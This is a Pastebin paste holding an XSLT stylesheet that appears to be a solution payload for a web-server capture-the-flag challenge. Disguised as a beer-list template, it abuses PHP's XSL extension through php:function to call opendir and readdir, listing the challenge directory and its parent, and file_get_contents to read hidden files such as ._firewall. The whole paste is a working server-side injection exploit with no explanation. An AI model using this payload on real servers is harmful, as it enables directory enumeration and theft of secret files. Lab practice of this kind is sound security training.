Advertisement
Guest User

Untitled

a guest
Dec 16th, 2018
81
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.26 KB | None | 0 0
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
  3. <body style="font-family:Arial;font-size:10pt;background-color:#00AAAA">
  4. <xsl:for-each select="beers/beer">
  5. <div style="background-color:teal;color:black;padding:4px">
  6. <span style="font-weight:bold"><xsl:value-of select="name"/> - </span>
  7. <xsl:value-of select="price"/>
  8.  
  9. <xsl:value-of select="php:function('opendir','/challenge/web-serveur/ch50/')"/>
  10. 1<xsl:value-of select="php:function('readdir')"/>
  11. 2<xsl:value-of select="php:function('readdir')"/>
  12. 3<xsl:value-of select="php:function('readdir')"/>
  13. 4<xsl:value-of select="php:function('readdir')"/>
  14. 5<xsl:value-of select="php:function('readdir')"/>
  15. 6<xsl:value-of select="php:function('readdir')"/>
  16. 7<xsl:value-of select="php:function('readdir')"/>
  17. 8<xsl:value-of select="php:function('readdir')"/>
  18. 9<xsl:value-of select="php:function('readdir')"/>
  19. 10<xsl:value-of select="php:function('readdir')"/>
  20. 11<xsl:value-of select="php:function('readdir')"/>
  21. 12<xsl:value-of select="php:function('readdir')"/>
  22. 13<xsl:value-of select="php:function('readdir')"/>
  23. 14<xsl:value-of select="php:function('readdir')"/>
  24. 15<xsl:value-of select="php:function('readdir')"/>
  25. 16<xsl:value-of select="php:function('readdir')"/>
  26. 17<xsl:value-of select="php:function('readdir')"/>
  27. 18<xsl:value-of select="php:function('readdir')"/>
  28. ---
  29. <xsl:value-of select="php:function('file_get_contents','.6ff3200bee785801f420fba826ffcdee')"/>
  30. ---
  31. ---
  32. <xsl:value-of select="php:function('file_get_contents','._firewall')"/>
  33. ---
  34. <xsl:value-of select="php:function('opendir','/challenge/web-serveur/ch50/..')"/>
  35. 1<xsl:value-of select="php:function('readdir')"/>
  36. 2<xsl:value-of select="php:function('readdir')"/>
  37. 3<xsl:value-of select="php:function('readdir')"/>
  38. 4<xsl:value-of select="php:function('readdir')"/>
  39. 5<xsl:value-of select="php:function('readdir')"/>
  40. 6<xsl:value-of select="php:function('readdir')"/>
  41.  
  42. </div>
  43. <div style="margin-left:20px;margin-bottom:1em;font-size:12pt">
  44. <p>
  45. <xsl:value-of select="description"/>
  46. <span style="font-style:bold"> (<xsl:value-of select="prct"/> %)</span>
  47. </p>
  48. </div>
  49. </xsl:for-each>
  50. </body>
  51. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement